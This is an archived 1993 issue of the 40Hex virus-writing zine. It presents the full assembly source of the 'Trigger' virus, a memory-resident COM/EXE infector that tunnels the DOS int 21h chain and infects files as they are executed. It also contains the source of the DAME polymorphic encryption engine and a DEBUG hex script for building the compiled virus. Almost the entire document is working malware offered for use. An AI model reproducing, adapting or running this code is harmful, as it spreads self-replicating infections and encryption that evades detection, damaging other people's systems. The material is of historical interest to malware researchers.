home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacks & Cracks
/
Hacks_and_Cracks.iso
/
hackersguides-&-software
/
40hex-11.zip
/
40HEX-11.003
< prev
next >
Wrap
Text File
|
1993-06-01
|
49KB
|
1,873 lines
40Hex Issue 11 Volume 3 Number 2 File 003
Trigger Virus
This virus was written as a test virus for DAME, Dark Angel's Multiple
Encryptor. Trigger is a resident COM/EXE infector with tunneling capabilities.
When it executes, it traces down the int 21h chain until it finds the original
int 21h handler. It then inserts code to jump to the virus, which returns
control to the original int 21h handler after processing the request.
-- Dark Angel
Phalcon/Skism 1993
-begin trigger.asm-------------------------------------------------------------
.model tiny
.code
.radix 16
org 0
viruslength = (heap - entry)
virussizeK = (endvirus - entry + 3ff) / 400
virussizepara = (virussizeK)*40
EXE_ID = 'PS'
entry:
call past
next:
db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A
db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A
db 0Dh,0A,0
checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63
past: cld
pop bp
mov ax,0cf0
mov bx,'DA'
int 21
cmp bx,'GH'
jnz no_trigger
trigger:
push ds
push es
push cs
pop ds
xor ax,ax
checkagain:
lea si,[bp+checkstub-next]
mov es,ax
xor di,di
mov cx,8
rep cmpsw
jz trigger_it
inc ax
cmp ax,0a000
jb checkagain
jmp exit_trigger
trigger_it:
mov [bp+patch-next],ax
mov ds,ax
mov byte ptr ds:73,0cbh
push bp
mov bp,-80
jmp short $+2
db 09a ; call far ptr
dw 1
patch dw ?
pop bp
mov byte ptr ds:73,1f
exit_trigger:
pop es
pop ds
jmp short restore
no_trigger:
mov ax,4b90
int 21
cmp ax,bx
jz restore
push ds
push es
mov ax,ds
dec ax
mov ds,ax
sub word ptr ds:3,virussizepara
sub word ptr ds:12,virussizepara
mov es,ds:12
push cs
pop ds
xor di,di
lea si,[bp+offset entry-offset next]
mov cx,(viruslength + 1)/2
rep movsw
xor ax,ax
mov ds,ax
sub word ptr ds:413,virussizeK
mov di,offset oldint21
mov si,21*4
movsw
movsw
cli
pushf
pushf
pop ax
or ah,1
push ax
mov ds:1*4+2,es
mov word ptr ds:1*4,offset int1_1
popf
mov ah,30
pushf
call dword ptr ds:21*4
popf
lds si,dword ptr es:oldint21
mov di,si
lodsw
mov word ptr es:int21patch1,ax
lodsw
mov word ptr es:int21patch2,ax
lodsb
mov byte ptr es:int21patch3,al
push ds ; es:di->int 21 handler
push es
pop ds ; ds->high segment
pop es
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,ds
stosw
sti
pop es
pop ds
restore:
cmp sp,-2
jnz restoreEXE
restoreCOM:
lea si,[bp+readbuffer-next]
mov di,100
push di
movsw
movsw
ret
restoreEXE:
mov ax,ds
add ax,10
add cs:[bp+readbuffer+16-next], ax
add ax,cs:[bp+readbuffer+0e-next]
mov ss,ax
mov sp,cs:[bp+readbuffer+10-next]
jmp dword ptr cs:[bp+readbuffer+14-next]
readbuffer dw 20cdh
dw 0bh dup (?)
int1_1:
push bp
mov bp,sp
push ax
mov ax, [bp+4] ; get segment
cmp ax, cs:oldint21+2
jae exitint1
mov cs:oldint21+2,ax
mov ax, [bp+2]
mov cs:oldint21,ax
exitint1:
pop ax
pop bp
iret
int1_2:
push bp
mov bp,sp
push ax
mov ax,cs
cmp ax,[bp+4]
jz exitint1
mov ax,[bp+4]
cmp ax,cs:oldint21+2
jnz int1_2_restore
mov ax,[bp+2]
cmp ax,cs:oldint21
jb int1_2_restore
sub ax,5
cmp ax,cs:oldint21
jbe exitint1
int1_2_restore:
push es
push di
cld
les di,dword ptr cs:oldint21
mov al,0ea
stosb
mov ax,offset int21
stosw
mov ax,cs
stosw
pop di
pop es
and [bp+6],0feff
jmp exitint1
install:
mov bx,ax
iret
int21:
cmp ax,4b90
jz install
push ds
push di
lds di,dword ptr cs:oldint21
mov word ptr ds:[di],1234
int21patch1 = $ - 2
mov word ptr ds:[di+2],1234
int21patch2 = $ - 2
mov byte ptr ds:[di+4],12
int21patch3 = $ - 1
pop di
pop ds
cld
cmp ax,4b00
jz infect
exitint21:
push ds
push ax
xor ax,ax
mov ds,ax
cli
mov word ptr ds:1*4,offset int1_2
mov ds:1*4+2,cs
sti
pushf
pop ax
or ah,1
push ax
popf
pop ax
pop ds
db 0ea
oldint21 dw 0, 0
callint21:
pushf
call dword ptr cs:oldint21
ret
already_infected:
pop dx
pop cx
mov ax,5701
call callint21
mov ah,3e
call callint21
exitnoclose:
mov ax,4301
pop dx
pop ds
pop cx
call callint21
exitinfect:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
jmp exitint21
infect:
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
mov ax,4300
call callint21
push cx
push ds
push dx
mov ax,4301
xor cx,cx
call callint21
mov ax,3d02
call callint21
jc exitnoclose
xchg ax,bx
mov ax,5700
int 21
push cx
push dx
mov ah,3f
mov cx,18
push cs
pop ds
push cs
pop es
mov dx,offset readbuffer
mov si,dx
call callint21
jc already_infected
mov di,offset writebuffer
mov cx,18/2
push si
push di
rep movsw
pop di
pop si
mov ax,4202
xor cx,cx
cwd
int 21
cmp word ptr [di],'ZM'
jnz infectCOM
infectEXE:
cmp readbuffer+10,EXE_ID
go_already_infected:
jz already_infected
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
mov cx,10
div cx
sub ax,ds:writebuffer+8
mov ds:writebuffer+14,dx
mov ds:writebuffer+16,ax
xchg cx,dx
mov ds:writebuffer+0e,ax
mov ds:writebuffer+10,EXE_ID
mov al,10b
jmp finishinfect
infectCOM: ; si = readbuffer, di = writebuffer
push ax
mov cx,4
xor dx,dx
check_infection_loop:
lodsb
add dl,al
loop check_infection_loop
pop ax
or dl,dl
jz go_already_infected
mov dx,18
cmp ax,dx
jnb no_fixup_com
mov ax,4200
xor cx,cx
int 21
no_fixup_com:
mov cx,ax
inc ch ; add cx,100
sub ax,3
push ax
mov al,0e9
stosb
pop ax
stosw
add al,ah
add al,0e9
neg al
stosb
mov al,11b
finishinfect:
cbw
; ax = bitmask
; bx = start decrypt in carrier file
; cx = encrypt length
; dx = start encrypt in virus
; si = buffer to put decryption routine
; di = buffer to put encryption routine
push bx
xchg cx,bx
xor si,si
mov di,offset copyvirus
mov cx,(heap-entry+1)/2
rep movsw
push ax
call rnd_init_seed
pop ax
mov dx,offset copyvirus
mov cx,viruslength
mov si,offset _decryptbuffer
mov di,offset _encryptbuffer
call dame
push cx
cmp ds:writebuffer,'ZM'
jnz no_fix_header
mov dx,ds:writebuffer+2
mov ax,ds:writebuffer+4
add cx,viruslength
add ax,cx
adc dx,0
mov cx,200
div cx
or dx,dx
jz nohiccup
inc ax
nohiccup:
mov ds:writebuffer+4,ax
mov ds:writebuffer+2,dx
no_fix_header:
call di
pop cx
pop bx
mov ah,40
mov dx,offset _decryptbuffer
call callint21
mov ah,40
mov cx,viruslength
mov dx,offset copyvirus
call callint21
mov ax,4200
xor cx,cx
cwd
int 21
mov ah,40
mov cx,18
mov dx,offset writebuffer
call callint21
jmp already_infected
vars = 0
include dame.asm
heap:
vars = 1
include dame.asm
writebuffer dw 0c dup (?)
_encryptbuffer: db 80 dup (?)
_decryptbuffer: db 180 dup (?)
copyvirus db viruslength dup (?)
db 20 dup (?)
endvirus:
end entry
-end trigger.asm----begin dame.asm---------------------------------------------
ifndef vars
vars = 2
endif
if vars eq 1
else
_ax = 0
_cx = 1
_dx = 2
_bx = 3
_sp = 4
_bp = 5
_si = 6
_di = 7
_es = 8
_cs = 9
_ss = 0a
_ds = 0bh
MAXNEST = 0a ; controls recursion problems
; ax = flags
; 15 : Reserved
; 14 : 0 = word, 1 = dword
; 13 : encryption direction : 0 = forwards, 1 = backwards
; 12 : counter direction : 0 = forwards, 1 = backwards
; 11 : ^
; 10 : R
; 9 : E
; 8 : S
; 7 : E
; 6 : R
; 5 : V
; 4 : E
; 3 : D
; 2 : v
; DAME sets the above bits
;
; Virus sets the following bits:
; 1 : garble : 1 = yes, 0 = no
; 0 : DS = CS : 1 = yes, 0 = no
; bx = start decrypt in carrier file
; cx = encrypt length
; dx = start encrypt
; si = buffer to put decryption routine
; di = buffer to put encryption routine
; ds = current cs
; es = current cs
; Returns:
; cx = decryption routine length
; all other registers are preserved.
rnd_init_seed:
push dx
push cx
push bx
mov ah,2C ; get time
int 21
in al,40 ; port 40h, 8253 timer 0 clock
mov ah,al
in al,40 ; port 40h, 8253 timer 0 clock
xor ax,cx
xor dx,ax
jmp short rnd_get_loop_done
get_rand:
push dx
push cx
push bx
in al,40 ; get from timer 0 clock
db 5 ; add ax, xxxx
rnd_get_patch1 dw 0
db 0BA ; mov dx, xxxx
rnd_get_patch2 dw 0
mov cx,7
rnd_get_loop:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_get_loop_loc
inc al
rnd_get_loop_loc:
loop rnd_get_loop
rnd_get_loop_done:
mov rnd_get_patch1,ax
mov rnd_get_patch2,dx
mov al,dl
pop bx
pop cx
pop dx
retn
reg_xlat_table:
db 10000111b ; bx
db 0 ; sp
db 10000110b ; bp
db 10000100b ; si
db 10000101b ; di
aligntable db 3,7,0f,1f
redo_dame:
pop di
pop si
pop dx
pop cx
pop bx
pop ax
dame: ; Dark Angel's Multiple Encryptor
cld
push ax
push bx
push cx
push dx
push si
push di
call _dame
pop di
pop si
pop dx
pop bx ; return value in cx
pop bx
pop ax
ret
_dame:
; set up variables
cld
push ax
mov ax,offset _encryptpointer
xchg ax,di ; pointer to encryption routine buffer
stosw
xchg si,ax ; pointer to decryption routine buffer
stosw
stosw
xchg ax,dx ; starting offset of encryption
stosw
xchg ax,bx ; starting offset of decryption routine
stosw
xchg cx,dx ; dx = encrypt size
call clear_used_regs
mov cx,(endclear1 - beginclear1) / 2
rep stosw
call get_rand
and ax,not 3
pop cx
xor cx,ax ; cx = bitmask
call get_rand_bx
and bx,3
mov al,byte ptr [bx+aligntable]
cbw
add dx,ax ; round up
not ax
and dx,ax
mov ax,dx ; new encryption length
stosw ; _encrypt_length
shr ax,1
test ch,40 ; dword?
jz word_encryption
shr ax,1
word_encryption:
test ch,10
jnz counter_backwards
neg ax
counter_backwards:
stosw ; _counter_value
xchg ax,dx ; get encryption length in bytes
test ch,20
jnz encrypt_forwards
neg ax ; pointer to start of decryption
encrypt_forwards:
stosw ; _pointer_value
call get_rand
stosw ; encryption value = _decrypt_value
mov ax,8484
stosb
push di
stosw
stosb
pop di
call one_in_two
js s1
call get_another
stosb
call get_rand
mov _pointer_value,ax
dec di
s1:
inc di
jmp short gbxoh_skip
get_bx_or_higher:
call clear_reg
gbxoh_skip:
call get_another
cmp al,_bx
jb get_bx_or_higher
stosb ; _pointer_reg
call one_in_two
js s2
call get_another
stosb ; _encrypt_reg
s2:
; encode setup part of decryption
call clear_used_regs
encode_setup:
mov di,_decryptpointer
call twogarble
mov si,offset _dummy_reg
push si
encode_setup_get_another:
call get_rand_bx
and bx,3
mov al,[si+bx]
cbw
test al,80
jnz encode_setup_get_another
or byte ptr [bx+_dummy_reg],80
mov si,ax
inc byte ptr [si+offset _used_regs]
add bx,bx
mov dx,word ptr [bx+_counter_value-2]
mov _nest,0
call mov_reg_xxxx
call twogarble
call swap_decrypt_encrypt
push cx
and cl,not 3
call _mov_reg_xxxx
pop cx
mov _encryptpointer,di
pop si
mov dx,4
encode_setup_check_if_done:
lodsb
test al,80
jz encode_setup
dec dx
jnz encode_setup_check_if_done
mov si,offset _encryptpointer
mov di,offset _loopstartencrypt
movsw
movsw
; encode decryption part of loop
mov _relocate_amt,0
call do_encrypt1
test ch,40
jz dont_encrypt2
mov _relocate_amt,2
call do_encrypt1
dont_encrypt2:
mov bx,offset _loopstartencrypt
push cx
and cl,not 3
call encodejmp
pop cx
mov ax,0c3fc ; cld, ret
stosw
mov si,offset _encrypt_relocator
mov di,_start_encrypt
push cx
call relocate
pop cx
mov bx,offset _loopstartdecrypt
call encodejmp
call fourgarble
mov _decryptpointer,di
mov si,offset _decrypt_relocator
sub di,_decryptpointer2
add di,_start_decrypt
relocate:
test ch,20
jz do_encrypt_backwards
add di,_encrypt_length
do_encrypt_backwards:
sub di,_pointer_value
mov cx,word ptr [si-2]
jcxz exit_relocate
xchg ax,di
relocate_loop:
xchg ax,di
lodsw
xchg ax,di
add [di],ax
loop relocate_loop
exit_relocate:
mov di,_decryptpointer
mov cx,di
sub cx,_decryptpointer2
ret
do_encrypt1:
call playencrypt
call encryption
call playencrypt
ret
encodejmp:
mov di,word ptr [bx+_encryptpointer-_loopstartencrypt]
push bx
mov _nest,0
mov al,_pointer_reg
and ax,7
mov dx,2
test ch,40
jz update_pointer1
shl dx,1
update_pointer1:
test ch,20
jz update_pointer2
neg dx
update_pointer2:
call add_reg_xxxx
mov dl,75 ; jnz
mov al,_counter_reg
and ax,7
cmp al,_sp
jz do_jnz
push dx
mov dx,1
test ch,10 ; check counter direction
jz go_counter_forwards
cmp al,_cx
jnz regular
call one_in_two
js regular
pop dx
call get_rand_bx
xchg bx,dx
and dl,2
or dl,0e0 ; loop/loopnz
jmp short do_jnz
regular:
neg dx
go_counter_forwards:
call add_reg_xxxx
pop dx
do_jnz:
pop bx
mov ax,[bx]
sub ax,di
dec ax
dec ax
xchg ah,al
mov al,dl ; jnz
test ah,80
jnz jmplocation_okay
pop ax
pop ax
jmp redo_dame
jmplocation_okay:
stosw
mov word ptr [bx+_encryptpointer-_loopstartencrypt],di
ret
swap_decrypt_encrypt:
mov _nest,MAXNEST
mov _decryptpointer,di
mov di,_encryptpointer
ret
playencrypt:
mov di,_decryptpointer
call twogarble
mov al,_encrypt_reg
and ax,7
cmp al,4 ; is there an encryption register?
jz swap_decrypt_encrypt
call get_rand_bx ; 3/4 chance of doing something
cmp bl,0c0
ja swap_decrypt_encrypt
call _playencrypt
call handle_jmp_table_nogarble
finish_encryption:
call swap_decrypt_encrypt
push cx
and cl,not 3
call [bx+si+1]
pop cx
mov _encryptpointer,di
ret
_playencrypt:
mov _nest,0
call one_in_two
js get_used_register
call get_rand_bx
mov si,offset oneregtable
jmp short continue_playencrypt
get_used_register:
call get_rand_bx
and bx,7
cmp bl,_sp
jz get_used_register
cmp byte ptr [bx+_used_regs],0
jz get_used_register
mov si,offset tworegtable
continue_playencrypt:
xchg dx,bx
ret
encryption:
mov di,_decryptpointer
call twogarble
mov al,_pointer_reg
and ax,7
mov bx,offset reg_xlat_table-3
xlat
mov bp,offset _decrypt_relocate_num
call _playencrypt
call go_next
call handle_jmp_table_nogarble
mov bp,offset _encrypt_relocate_num
call go_next
jmp short finish_encryption
go_next:
push ax
lodsb
cbw
add si,ax
pop ax
inc si
inc si
ret
clear_used_regs:
xor ax,ax
mov di,offset _used_regs
stosw
stosw
inc ax
stosw
dec ax
stosw
ret
get_another:
call get_rand
and ax,7
mov si,ax
cmp [si+_used_regs],0
jnz get_another
inc [si+_used_regs]
ret
clear_reg_dx:
xchg ax,dx
clear_reg:
mov si,ax
mov byte ptr [si+_used_regs],0
ret
free_regs: ; check for free registers
; zero flag if OK
push ax
push cx
push di
mov di,offset _used_regs
mov cx,8
xor ax,ax
repne scasb
pop di
pop cx
pop ax
ret
one_in_two:
push ax
call get_rand
or ax,ax
pop ax
ret
get_rand_bx:
xchg ax,bx
call get_rand
xchg ax,bx
return:
ret
fourgarble:
call twogarble
twogarble:
mov _nest,0
call garble
garble: ; ax, dx preserved
call free_regs
jne return
test cl,2
jz return
push ax
push dx
call get_rand ; random # to dx
xchg ax,dx
call get_another ; random reg in al
call clear_reg ; don't mark as used
mov si,offset garbletable
jmp short handle_jmp_table_nopush_ax_dx
handle_jmp_table: ; ax,dx preserved
push si
call garble
pop si
handle_jmp_table_nogarble:
push ax
push dx
handle_jmp_table_nopush_ax_dx:
push si
push cx
xchg ax,cx
lodsb ; get mask value
cbw
xchg ax,cx
call get_rand_bx
and bx,cx
pop cx
inc _nest
cmp _nest,MAXNEST
jb not_max_nest
xor bx,bx
not_max_nest:
push bx
call [bx+si]
pop bx
pop si
pop dx
pop ax
ret
garble_tworeg:
mov si,offset tworegtable
and dx,7
jmp short handle_jmp_table_nogarble
garble_onereg:
mov si,offset oneregtable
jmp short handle_jmp_table_nogarble
garble_onebyte:
xchg ax,dx
and al,7
mov bx,offset onebytetable
xlat
stosb
ret
garble_jmpcond:
xchg ax,dx
and ax,0f
or al,70
stosw
ret
_push:
or al,al
js _push_mem
add al,50
stosb
ret
_push_mem:
add ax,0ff30
jmp short go_mod_xxx_rm1
_pop:
or al,al
js _pop_mem
add al,58
stosb
ret
_pop_mem:
mov ah,8f
go_mod_xxx_rm1:
jmp mod_xxx_rm
mov_reg_xxxx:
mov si,offset mov_reg_xxxx_table
go_handle_jmp_table1:
jmp short handle_jmp_table
_mov_reg_xxxx_mov_add:
call get_rand_bx
push bx
sub dx,bx
call mov_reg_xxxx
pop dx
jmp short go_add_reg_xxxx
_mov_reg_xxxx_mov_al_ah:
cmp al,_sp
jae _mov_reg_xxxx
push ax
push dx
call _mov_al_xx
pop dx
pop ax
xchg dh,dl
jmp short _mov_ah_xx
_mov_reg_xxxx_mov_xor:
call get_rand_bx
push bx
xor dx,bx
call mov_reg_xxxx
pop dx
jmp xor_reg_xxxx
_mov_reg_xxxx_xor_add:
push dx
mov dx,ax
call xor_reg_reg
pop dx
go_add_reg_xxxx:
jmp add_reg_xxxx
_mov_reg_xxxx_mov_rol:
ror dx,1
call mov_reg_xxxx
jmp short _rol
_mov_reg_xxxx_mov_ror:
rol dx,1
call mov_reg_xxxx
_ror:
or al,8
_rol:
mov ah,0d1
jmp mod_xxx_rm
_mov_reg_xxxx:
add al,0B8
stosb
xchg ax,dx
stosw
ret
mov_ah_xx:
_mov_ah_xx:
add al,04
mov_al_xx:
_mov_al_xx:
add al,0B0
mov ah,dl
stosw
ret
mov_reg_reg:
mov si,offset mov_reg_reg_table
jmp short go_handle_jmp_table1
_mov_reg_reg_push_pop:
push ax
xchg dx,ax ; al = reg2
call _push ; push reg2
pop ax ; al = reg1
jmp _pop ; pop reg1
_mov_reg_reg:
mov ah,08Bh
jmp short _mod_reg_rm_direction
mov_xchg_reg_reg:
call one_in_two
js mov_reg_reg
xchg_reg_reg:
mov si,offset xchg_reg_reg_table
jmp handle_jmp_table
_xchg_reg_reg_push_pop:
push dx ; save reg2
push ax ; save reg1
push dx
call _push ; push reg1
pop ax
call _push ; push reg2
pop ax
call _pop ; pop reg1
pop ax
jmp _pop ; pop reg2
_xchg_reg_reg_3rd_reg:
call free_regs
jne _xchg_reg_reg
push dx ; save reg2
push ax ; save reg1
call get_another
call mov_xchg_reg_reg ; mov/xchg reg3, reg2
pop dx ; get reg1
call xchg_reg_reg ; xchg reg3, reg1
pop dx ; get reg2
xchg ax,dx ; ax=reg2, dx=reg3
call mov_xchg_reg_reg ; mov/xchg reg2, reg3
jmp clear_reg_dx
_xchg_reg_reg:
or al,al
js __xchg_reg_reg
cmp al,dl
jg _xchg_reg_reg_skip
xchg al,dl
_xchg_reg_reg_skip:
or dl,dl
jz _xchg_ax_reg
__xchg_reg_reg:
xchg al,dl
mov ah,87
jmp short _mod_reg_rm
_xchg_ax_reg:
add al,90
stosb
ret
xor_reg_xxxx_xor_xor:
call get_rand_bx
push bx
xor dx,bx
call xor_reg_xxxx
pop dx
jmp short xor_reg_xxxx
xor_reg_xxxx:
mov si,offset xor_reg_xxxx_table
jmp handle_jmp_table
_xor_reg_xxxx:
or al,030
jmp _81h_
xor_reg_reg:
mov si,offset xor_reg_reg_table
jmp handle_jmp_table
_xor_reg_reg:
mov ah,33
_mod_reg_rm_direction:
or al,al
js dodirection
or dl,dl
js _mod_reg_rm
call one_in_two
js _mod_reg_rm
dodirection:
xchg al,dl
sub ah,2
_mod_reg_rm:
shl al,1
shl al,1
shl al,1
or al,dl
mod_xxx_rm:
or al,al
js no_no_reg
or al,0c0
no_no_reg:
xchg ah,al
test ah,40
jnz exit_mod_reg_rm
test cl,1
jnz continue_mod_xxx_rm
push ax
mov al,2e
stosb
pop ax
continue_mod_xxx_rm:
stosw
mov si,cs:[bp] ; need cs: overrides on bp
add si,si
mov cs:[si+bp+2],di
inc word ptr cs:[bp]
mov al,_relocate_amt
cbw
exit_mod_reg_rm:
stosw
ret
add_reg_reg:
mov si,offset add_reg_reg_table
jmp handle_jmp_table
_add_reg_reg:
mov ah,3
jmp short _mod_reg_rm_direction
sub_reg_reg:
mov si,offset sub_reg_reg_table
jmp handle_jmp_table
_sub_reg_reg:
mov ah,2bh
jmp short _mod_reg_rm_direction
_add_reg_xxxx_inc_add:
call inc_reg
dec dx
jmp short add_reg_xxxx
_add_reg_xxxx_dec_add:
call dec_reg
inc dx
jmp short add_reg_xxxx
_add_reg_xxxx_add_add:
call get_rand_bx
push bx
sub dx,bx
call add_reg_xxxx
pop dx
jmp short add_reg_xxxx
add_reg_xxxx1:
neg dx
add_reg_xxxx:
or dx,dx
jnz cont
return1:
ret
cont:
mov si,offset add_reg_xxxx_table
jmp handle_jmp_table
_add_reg_xxxx:
or al,al
jz _add_ax_xxxx
_81h_:
or al,al
js __81h
add al,0c0
__81h:
mov ah,81
call mod_xxx_rm
_encode_dx_:
xchg ax,dx
stosw
ret
_add_ax_xxxx:
mov al,5
_encode_al_dx_:
stosb
jmp short _encode_dx_
sub_reg_xxxx1:
neg dx
sub_reg_xxxx:
_sub_reg_xxxx:
or dx,dx
jz return1
or al,al
jz _sub_ax_xxxx
add al,028
jmp short _81h_
_sub_ax_xxxx:
mov al,2dh
jmp short _encode_al_dx_
dec_reg:
push ax
add al,8
jmp short _dec_inc_reg
inc_reg:
push ax
_dec_inc_reg:
or al,al
jns _norm_inc
mov ah,0ff
call mod_xxx_rm
pop ax
ret
_norm_inc:
add al,40
stosb
pop ax
ret
_mov_reg_reg_3rd_reg:
mov bx,offset mov_reg_reg
mov si,offset mov_xchg_reg_reg
jmp short reg_to_reg
xor_reg_reg_reg_reg:
mov bx,offset _xor_reg_reg
jmp short reg_to_reg1
add_reg_reg_reg_reg:
mov bx,offset _add_reg_reg
jmp short reg_to_reg1
sub_reg_reg_reg_reg:
mov bx,offset _sub_reg_reg
reg_to_reg1:
mov si,bx
reg_to_reg:
call free_regs
jne no_free_regs
push ax
push si
call get_another
call mov_reg_reg ; mov reg3, reg2
pop si
pop dx ; ax=reg3, dx=reg1
xchg ax,dx ; ax=reg1, dx=reg3
push dx
call si
pop dx
go_clear_reg_dx:
jmp clear_reg_dx
_xor_reg_xxxx_reg_reg:
mov bx,offset xor_reg_xxxx
mov si,offset xor_reg_reg
xxxx_to_reg:
call free_regs
jne no_free_regs
push ax
push si
call get_another
call mov_reg_xxxx
xchg ax,dx
pop si
pop ax
push dx
call si
pop dx
jmp short go_clear_reg_dx
no_free_regs:
jmp bx
_add_reg_xxxx_reg_reg:
mov bx,offset add_reg_xxxx
mov si,offset add_reg_reg
jmp short xxxx_to_reg
_mov_reg_xxxx_reg_reg:
mov bx,offset mov_reg_xxxx
mov si,offset mov_xchg_reg_reg
jmp short xxxx_to_reg
garbletable:
db garbletableend - $ - 3
dw offset return
dw offset return
dw offset garble_tworeg
dw offset garble_tworeg
dw offset garble_onereg
dw offset garble_onereg
dw offset garble_onebyte
dw offset garble_jmpcond
garbletableend:
onebytetable:
clc
cmc
stc
cld
std
sti
int 3
lock
oneregtable:
db oneregtableend - $ - 3
dw offset xor_reg_xxxx
dw offset mov_reg_xxxx
dw offset sub_reg_xxxx
dw offset add_reg_xxxx
dw offset dec_reg
dw offset inc_reg
dw offset _ror
dw offset _rol
oneregtableend:
oneregtable1:
db oneregtable1end - $ - 3
dw offset xor_reg_xxxx
dw offset sub_reg_xxxx
dw offset add_reg_xxxx
dw offset add_reg_xxxx
dw offset dec_reg
dw offset inc_reg
dw offset _ror
dw offset _rol
oneregtable1end:
oneregtable2:
db oneregtable2end - $ - 3
dw offset xor_reg_xxxx
dw offset add_reg_xxxx
dw offset sub_reg_xxxx
dw offset sub_reg_xxxx
dw offset inc_reg
dw offset dec_reg
dw offset _rol
dw offset _ror
oneregtable2end:
tworegtable:
db tworegtableend - $ - 3
dw offset xor_reg_reg
dw offset mov_reg_reg
dw offset sub_reg_reg
dw offset add_reg_reg
tworegtableend:
tworegtable1:
db tworegtable1end - $ - 3
dw offset xor_reg_reg
dw offset xor_reg_reg
dw offset sub_reg_reg
dw offset add_reg_reg
tworegtable1end:
tworegtable2:
db tworegtable2end - $ - 3
dw offset xor_reg_reg
dw offset xor_reg_reg
dw offset add_reg_reg
dw offset sub_reg_reg
tworegtable2end:
mov_reg_xxxx_table:
db mov_reg_xxxx_table_end - $ - 3
dw offset _mov_reg_xxxx
dw offset _mov_reg_xxxx_reg_reg
dw offset _mov_reg_xxxx_mov_add
dw offset _mov_reg_xxxx_mov_al_ah
dw offset _mov_reg_xxxx_mov_xor
dw offset _mov_reg_xxxx_xor_add
dw offset _mov_reg_xxxx_mov_rol
dw offset _mov_reg_xxxx_mov_ror
mov_reg_xxxx_table_end:
mov_reg_reg_table:
db mov_reg_reg_table_end - $ - 3
dw offset _mov_reg_reg
dw offset _mov_reg_reg
dw offset _mov_reg_reg_3rd_reg
dw offset _mov_reg_reg_push_pop
mov_reg_reg_table_end:
xchg_reg_reg_table:
db xchg_reg_reg_table_end - $ - 3
dw offset _xchg_reg_reg
dw offset _xchg_reg_reg
dw offset _xchg_reg_reg_push_pop
dw offset _xchg_reg_reg_3rd_reg
xchg_reg_reg_table_end:
xor_reg_xxxx_table:
db xor_reg_xxxx_table_end - $ - 3
dw offset _xor_reg_xxxx
dw offset _xor_reg_xxxx
dw offset _xor_reg_xxxx_reg_reg
dw offset xor_reg_xxxx_xor_xor
xor_reg_xxxx_table_end:
xor_reg_reg_table:
db xor_reg_reg_table_end - $ - 3
dw offset _xor_reg_reg
dw offset xor_reg_reg_reg_reg
xor_reg_reg_table_end:
add_reg_reg_table:
db add_reg_reg_table_end - $ - 3
dw offset _add_reg_reg
dw offset add_reg_reg_reg_reg
add_reg_reg_table_end:
sub_reg_reg_table:
db sub_reg_reg_table_end - $ - 3
dw offset _sub_reg_reg
dw offset sub_reg_reg_reg_reg
sub_reg_reg_table_end:
add_reg_xxxx_table:
db add_reg_xxxx_table_end - $ - 3
dw offset _add_reg_xxxx
dw offset _add_reg_xxxx
dw offset _add_reg_xxxx_reg_reg
dw offset sub_reg_xxxx1
dw offset _add_reg_xxxx_inc_add
dw offset _add_reg_xxxx_dec_add
dw offset _add_reg_xxxx_add_add
dw offset _add_reg_xxxx_add_add
add_reg_xxxx_table_end:
endif
if vars eq 0
else
_nest db ? ; needed to prevent infinite recursion
_relocate_amt db ?
_loopstartencrypt dw ?
_loopstartdecrypt dw ?
_encryptpointer dw ?
_decryptpointer dw ?
_decryptpointer2 dw ?
_start_encrypt dw ?
_start_decrypt dw ?
_used_regs db 8 dup (?) ; 0 = unused
beginclear1:
_encrypt_relocate_num dw ?
_encrypt_relocator dw 8 dup (?)
_decrypt_relocate_num dw ?
_decrypt_relocator dw 10 dup (?)
endclear1:
_encrypt_length dw ? ; based upon alignment
_counter_value dw ? ; _counter_reg
_pointer_value dw ?
_decrypt_value dw ?
_dummy_reg db ?
_counter_reg db ?
_pointer_reg db ? ; 4 = not in use
_encrypt_reg db ?
endif
-end dame.asm-------begin trigger.scr------------------------------------------
n trigger.com
e 0100 E8 6E 00 00 54 72 69 67 67 65 72 20 62 79 20 44
e 0110 61 72 6B 20 41 6E 67 65 6C 20 6F 66 20 50 68 61
e 0120 6C 63 6F 6E 2F 53 6B 69 73 6D 0D 0A 55 74 69 6C
e 0130 69 73 69 6E 67 20 44 61 72 6B 20 41 6E 67 65 6C
e 0140 27 73 20 4D 75 6C 74 69 70 6C 65 20 45 6E 63 72
e 0150 79 70 74 6F 72 20 28 44 41 4D 45 29 0D 0A 0D 0A
e 0160 00 72 FA 0E 1F BA 00 B8 B8 40 00 8E C0 26 81 3E
e 0170 63 FC 5D B8 F0 0C BB 41 44 CD 21 81 FB 48 47 75
e 0180 3C 1E 06 0E 1F 33 C0 8D 76 5E 8E C0 33 FF B9 08
e 0190 00 F3 A7 74 08 40 3D 00 A0 72 EC EB 1C 89 86 AE
e 01A0 00 8E D8 C6 06 73 00 CB 55 BD 80 FF EB 00 9A 01
e 01B0 00 00 00 5D C6 06 73 00 1F 07 1F EB 7F B8 90 4B
e 01C0 CD 21 3B C3 74 76 1E 06 8C D8 48 8E D8 81 2E 03
e 01D0 00 80 01 81 2E 12 00 80 01 8E 06 12 00 0E 1F 33
e 01E0 FF 8D 76 FD B9 D1 04 F3 A5 33 C0 8E D8 83 2E 13
e 01F0 04 06 BF 1F 02 BE 84 00 A5 A5 FA 9C 9C 58 80 CC
e 0200 01 50 8C 06 06 00 C7 06 04 00 7F 01 9D B4 30 9C
e 0210 FF 1E 84 00 9D 26 C5 36 1F 02 8B FE AD 26 A3 F0
e 0220 01 AD 26 A3 F5 01 AC 26 A2 FA 01 1E 06 1F 07 B0
e 0230 EA AA B8 E2 01 AB 8C D8 AB FB 07 1F 83 FC FE 75
e 0240 0B 8D B6 64 01 BF 00 01 57 A5 A5 C3 8C D8 05 10
e 0250 00 2E 01 86 7A 01 2E 03 86 72 01 8E D0 2E 8B A6
e 0260 74 01 2E FF AE 78 01 CD 20 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55
e 0280 8B EC 50 8B 46 04 2E 3B 06 21 02 73 0B 2E A3 21
e 0290 02 8B 46 02 2E A3 1F 02 58 5D CF 55 8B EC 50 8C
